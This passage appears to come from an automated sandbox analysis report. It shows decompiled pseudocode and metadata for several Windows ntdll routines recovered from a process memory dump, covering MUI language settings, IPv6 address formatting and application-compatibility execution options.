					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00AD8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00ABE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00AD718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00AD8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00AD718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00AD8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00AD8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00AD8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00AD718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00AB2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00ACE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00ABE2A8(_t322,  &_v68, _v16);
								if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00ACE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00ABE2A8(_t322,  &_v68, _t236);
								if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00AD718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00AB2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00ACE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00ABE2A8(_v12,  &_v68, _v16);
							if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00ACE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00ABE2A8(_t322,  &_v68, _t269);
							if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00AD718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00AB2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00ACE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00ABE2A8(_v12,  &_v68, _v16);
						if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00ACE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00ABE2A8(_t322,  &_v68, _t296);
						if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x00ad8788
                                                              0x00ad8788
                                                              0x00ad8791
                                                              0x00ad8794
                                                              0x00ad8798
                                                              0x00ad879b
                                                              0x00ad879e
                                                              0x00ad87a1
                                                              0x00ad87a4
                                                              0x00ad87a7
                                                              0x00ad87aa
                                                              0x00ad87af
                                                              0x00b21ad3
                                                              0x00ad8b0a
                                                              0x00ad8b0d
                                                              0x00ad8b13
                                                              0x00ad8b19
                                                              0x00ad8b1f
                                                              0x00ad8b25
                                                              0x00ad8b2b
                                                              0x00ad8b31
                                                              0x00ad8b37
                                                              0x00ad8b3d
                                                              0x00ad8b46
                                                              0x00ad8b46
                                                              0x00ad87c6
                                                              0x00ad87d0
                                                              0x00b21ae0
                                                              0x00b21ae6
                                                              0x00b21af8
                                                              0x00b21af8
                                                              0x00b21afd
                                                              0x00b21afe
                                                              0x00b21b01
                                                              0x00b21b06
                                                              0x00b21b06
                                                              0x00ad87d6
                                                              0x00ad87f2
                                                              0x00ad87f7
                                                              0x00ad8807
                                                              0x00ad880a
                                                              0x00ad880f
                                                              0x00ad8810
                                                              0x00ad8813
                                                              0x00ad8818
                                                              0x00ad8818
                                                              0x00ad882c
                                                              0x00ad8831
                                                              0x00ad8838
                                                              0x00ad8908
                                                              0x00ad8920
                                                              0x00ad89f0
                                                              0x00ad8a08
                                                              0x00ad8af6
                                                              0x00ad8af6
                                                              0x00ad8af8
                                                              0x00ad8afb
                                                              0x00b21beb
                                                              0x00b21beb
                                                              0x00ad8b04
                                                              0x00b21bf8
                                                              0x00b21c0e
                                                              0x00b21c13
                                                              0x00b21c16
                                                              0x00b21c16
                                                              0x00b21bf8
                                                              0x00000000
                                                              0x00ad8b04
                                                              0x00ad8a0e
                                                              0x00ad8a11
                                                              0x00ad8a14
                                                              0x00ad8a15
                                                              0x00ad8a18
                                                              0x00ad8a22
                                                              0x00ad8b59
                                                              0x00ad8a28
                                                              0x00ad8a3c
                                                              0x00ad8a3c
                                                              0x00ad8a42
                                                              0x00b21bb0
                                                              0x00b21b11
                                                              0x00b21b11
                                                              0x00000000
                                                              0x00ad8a48
                                                              0x00ad8a51
                                                              0x00ad8a5b
                                                              0x00ad8a5e
                                                              0x00ad8a61
                                                              0x00ad8a69
                                                              0x00ad8a69
                                                              0x00ad8a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad8a74
                                                              0x00ad8a7c
                                                              0x00ad8a7d
                                                              0x00ad8a91
                                                              0x00ad8a93
                                                              0x00ad8a93
                                                              0x00ad8a98
                                                              0x00ad8a9b
                                                              0x00ad8aa1
                                                              0x00ad8aa1
                                                              0x00ad8aa4
                                                              0x00ad8aaa
                                                              0x00ad8ab1
                                                              0x00ad8ac5
                                                              0x00ad8ac7
                                                              0x00ad8ac7
                                                              0x00ad8ac5
                                                              0x00ad8ace
                                                              0x00b21bc9
                                                              0x00b21bce
                                                              0x00b21bd2
                                                              0x00b21bd2
                                                              0x00ad8ad8
                                                              0x00ad8aeb
                                                              0x00ad8aeb
                                                              0x00ad8af0
                                                              0x00ad8af4
                                                              0x00000000
                                                              0x00ad8af4
                                                              0x00ad8a42
                                                              0x00ad8926
                                                              0x00ad8929
                                                              0x00ad892c
                                                              0x00ad892d
                                                              0x00ad8930
                                                              0x00ad8935
                                                              0x00ad893a
                                                              0x00ad8b51
                                                              0x00ad8940
                                                              0x00ad8954
                                                              0x00ad8954
                                                              0x00ad895a
                                                              0x00b21b63
                                                              0x00000000
                                                              0x00ad8960
                                                              0x00ad8969
                                                              0x00ad8973
                                                              0x00ad8976
                                                              0x00ad8979
                                                              0x00ad897e
                                                              0x00ad8981
                                                              0x00ad8981
                                                              0x00ad8986
                                                              0x00000000
                                                              0x00000000
                                                              0x00b21b6e
                                                              0x00b21b74
                                                              0x00b21b7b
                                                              0x00b21b8f
                                                              0x00b21b91
                                                              0x00b21b91
                                                              0x00b21b99
                                                              0x00b21b9c
                                                              0x00b21ba2
                                                              0x00b21ba2
                                                              0x00ad898c
                                                              0x00ad8992
                                                              0x00ad8999
                                                              0x00ad89ad
                                                              0x00b21ba8
                                                              0x00b21ba8
                                                              0x00ad89ad
                                                              0x00ad89b6
                                                              0x00ad89c8
                                                              0x00ad89cd
                                                              0x00ad89d0
                                                              0x00ad89d0
                                                              0x00ad89d6
                                                              0x00ad89e8
                                                              0x00ad89e8
                                                              0x00ad89ed
                                                              0x00000000
                                                              0x00ad89ed
                                                              0x00ad895a
                                                              0x00ad883e
                                                              0x00ad8841
                                                              0x00ad8844
                                                              0x00ad8845
                                                              0x00ad8848
                                                              0x00ad884d
                                                              0x00ad8852
                                                              0x00ad8b49
                                                              0x00ad8858
                                                              0x00ad886c
                                                              0x00ad886c
                                                              0x00ad8872
                                                              0x00b21b0e
                                                              0x00000000
                                                              0x00ad8878
                                                              0x00ad8881
                                                              0x00ad888b
                                                              0x00ad888e
                                                              0x00ad8891
                                                              0x00ad8896
                                                              0x00ad8899
                                                              0x00ad8899
                                                              0x00ad889e
                                                              0x00000000
                                                              0x00000000
                                                              0x00b21b21
                                                              0x00b21b27
                                                              0x00b21b2e
                                                              0x00b21b42
                                                              0x00b21b44
                                                              0x00b21b44
                                                              0x00b21b4c
                                                              0x00b21b4f
                                                              0x00b21b55
                                                              0x00b21b55
                                                              0x00ad88a4
                                                              0x00ad88aa
                                                              0x00ad88b1
                                                              0x00ad88c5
                                                              0x00b21b5b
                                                              0x00b21b5b
                                                              0x00ad88c5
                                                              0x00ad88ce
                                                              0x00ad88e0
                                                              0x00ad88e5
                                                              0x00ad88e8
                                                              0x00ad88e8
                                                              0x00ad88ee
                                                              0x00ad8900
                                                              0x00ad8900
                                                              0x00ad8905
                                                              0x00000000
                                                              0x00ad8905

                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 00AD87C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00AD87E6
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00AD8827
                                                              • Kernel-MUI-Language-SKU, xrefs: 00AD89FC
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00AD8914
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 5c4f9baee81f8e8dbbb59ef3cfcf2fa5b1ecfe2e643557cd26513729e1303a6e
                                                              • Instruction ID: ad7cedae243c74b654d86ac8fa405d2df327f4b9eead565faffdb1c7ff2da568
                                                              • Opcode Fuzzy Hash: 5c4f9baee81f8e8dbbb59ef3cfcf2fa5b1ecfe2e643557cd26513729e1303a6e
                                                              • Instruction Fuzzy Hash: E1F1E8B2D00249EFCF11EF99CA85DEEB7B8FF18300F15446AE506A7211EB359A45DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E00AF13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00AE7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xab2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00AE7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xab9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00AE7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00AE7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00AE7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00AE7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x00af13d5
                                                              0x00af13d9
                                                              0x00af13dc
                                                              0x00af13de
                                                              0x00af13e1
                                                              0x00af13e8
                                                              0x00af13ee
                                                              0x00b1e8fd
                                                              0x00000000
                                                              0x00b1e921
                                                              0x00b1e921
                                                              0x00b1e928
                                                              0x00b1e982
                                                              0x00b1e98a
                                                              0x00000000
                                                              0x00b1e99a
                                                              0x00b1e99e
                                                              0x00b1e9a3
                                                              0x00b1e9a8
                                                              0x00b1e9b9
                                                              0x00b1e978
                                                              0x00000000
                                                              0x00b1e978
                                                              0x00b1e98a
                                                              0x00b1e92a
                                                              0x00b1e931
                                                              0x00b1e944
                                                              0x00b1e944
                                                              0x00b1e950
                                                              0x00b1e954
                                                              0x00b1e959
                                                              0x00b1e95e
                                                              0x00b1e963
                                                              0x00b1e970
                                                              0x00000000
                                                              0x00b1e975
                                                              0x00b1e93b
                                                              0x00b1e980
                                                              0x00000000
                                                              0x00b1e980
                                                              0x00b1e942
                                                              0x00b1e94b
                                                              0x00000000
                                                              0x00b1e94b
                                                              0x00000000
                                                              0x00b1e942
                                                              0x00af13f4
                                                              0x00af13f4
                                                              0x00af13f9
                                                              0x00af13fc
                                                              0x00af13ff
                                                              0x00af1406
                                                              0x00b1e9cc
                                                              0x00b1e9d2
                                                              0x00b1e9d2
                                                              0x00b1e9cc
                                                              0x00af140c
                                                              0x00af1411
                                                              0x00af1431
                                                              0x00af143a
                                                              0x00af143c
                                                              0x00af143f
                                                              0x00af143f
                                                              0x00af1442
                                                              0x00af1447
                                                              0x00af14a8
                                                              0x00af14ac
                                                              0x00b1e9e2
                                                              0x00b1e9e7
                                                              0x00b1e9ec
                                                              0x00b1ea05
                                                              0x00b1ea05
                                                              0x00000000
                                                              0x00af1449
                                                              0x00000000
                                                              0x00af1449
                                                              0x00af144c
                                                              0x00af1459
                                                              0x00af1462
                                                              0x00af1469
                                                              0x00af146a
                                                              0x00af1470
                                                              0x00af1473
                                                              0x00af1476
                                                              0x00af1476
                                                              0x00af1490
                                                              0x00af1495
                                                              0x00af138e
                                                              0x00af1390
                                                              0x00af1397
                                                              0x00af1398
                                                              0x00af1399
                                                              0x00af13a1
                                                              0x00af13a4
                                                              0x00af13a4
                                                              0x00af1498
                                                              0x00af149c
                                                              0x00af149f
                                                              0x00af14a2
                                                              0x00000000
                                                              0x00000000
                                                              0x00af14a4
                                                              0x00000000
                                                              0x00af14a4
                                                              0x00af1413
                                                              0x00af1415
                                                              0x00af1416
                                                              0x00af1419
                                                              0x00af141c
                                                              0x00af1422
                                                              0x00af13b7
                                                              0x00af13bc
                                                              0x00af13bf
                                                              0x00af13bf
                                                              0x00af13c2
                                                              0x00af1424
                                                              0x00af1424
                                                              0x00af1424
                                                              0x00af1427
                                                              0x00af142b
                                                              0x00af142c
                                                              0x00af142c
                                                              0x00af142c
                                                              0x00000000
                                                              0x00af141c
                                                              0x00af1411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 2aadc43fc5ea54159f471746939b5d0eaf6e7eb2fb12e9104d12ae68941dd8ad
                                                              • Instruction ID: 72463a78efba54cfdf669d9a47393c446a86607346688694d2b7ff926d498d41
                                                              • Opcode Fuzzy Hash: 2aadc43fc5ea54159f471746939b5d0eaf6e7eb2fb12e9104d12ae68941dd8ad
                                                              • Instruction Fuzzy Hash: FB6116B1900659EACB24CF9AC8908BFBBF5EFD4301B54C56DFAA647541D334AA40DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00AE7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb92088; // 0x757c166b
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00AE7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00B03F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00ABDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb94218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00B03F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00AC0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00B03F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00AC8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00B03F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00B2E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00B03F92();
					_t38 = 1;
					L2:
					return E00ABE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x00ae7f08
                                                              0x00ae7f0f
                                                              0x00ae7f12
                                                              0x00ae7f1b
                                                              0x00ae7f31
                                                              0x00b03ead
                                                              0x00b03eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00b03eba
                                                              0x00b03ecd
                                                              0x00b03ed2
                                                              0x00b03ee1
                                                              0x00b03ee7
                                                              0x00b03eec
                                                              0x00b03f12
                                                              0x00b03f18
                                                              0x00b03f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00b03f20
                                                              0x00b03f26
                                                              0x00b03f28
                                                              0x00000000
                                                              0x00000000
                                                              0x00b03f2e
                                                              0x00b03f30
                                                              0x00000000
                                                              0x00000000
                                                              0x00b03f3a
                                                              0x00b03f3b
                                                              0x00b03f53
                                                              0x00b03f64
                                                              0x00b03f69
                                                              0x00b03f6c
                                                              0x00b03f6d
                                                              0x00b03f6f
                                                              0x00b0e304
                                                              0x00b0e30f
                                                              0x00b0e315
                                                              0x00b0e31e
                                                              0x00b0e321
                                                              0x00b0e327
                                                              0x00b0e329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b0e32f
                                                              0x00b0e32f
                                                              0x00b0e337
                                                              0x00b0e33a
                                                              0x00b0e33b
                                                              0x00b0e33d
                                                              0x00b0e33f
                                                              0x00b0e341
                                                              0x00b0e341
                                                              0x00b0e34e
                                                              0x00b0e353
                                                              0x00b0e358
                                                              0x00b0e35d
                                                              0x00b0e35f
                                                              0x00000000
                                                              0x00000000
                                                              0x00b0e365
                                                              0x00b0e365
                                                              0x00b0e368
                                                              0x00b0e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x00b0e374
                                                              0x00b0e32f
                                                              0x00b03f75
                                                              0x00b03f7a
                                                              0x00b03f7c
                                                              0x00b03f7e
                                                              0x00b03f86
                                                              0x00ae7f39
                                                              0x00ae7f47
                                                              0x00ae7f47
                                                              0x00ae7f37
                                                              0x00ae7f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B03F12
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B0E2FB
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B0E345
                                                              • ExecuteOptions, xrefs: 00B03F04
                                                              • Execute=1, xrefs: 00B03F5E
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B03F75
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B03F4A
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B03EC4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
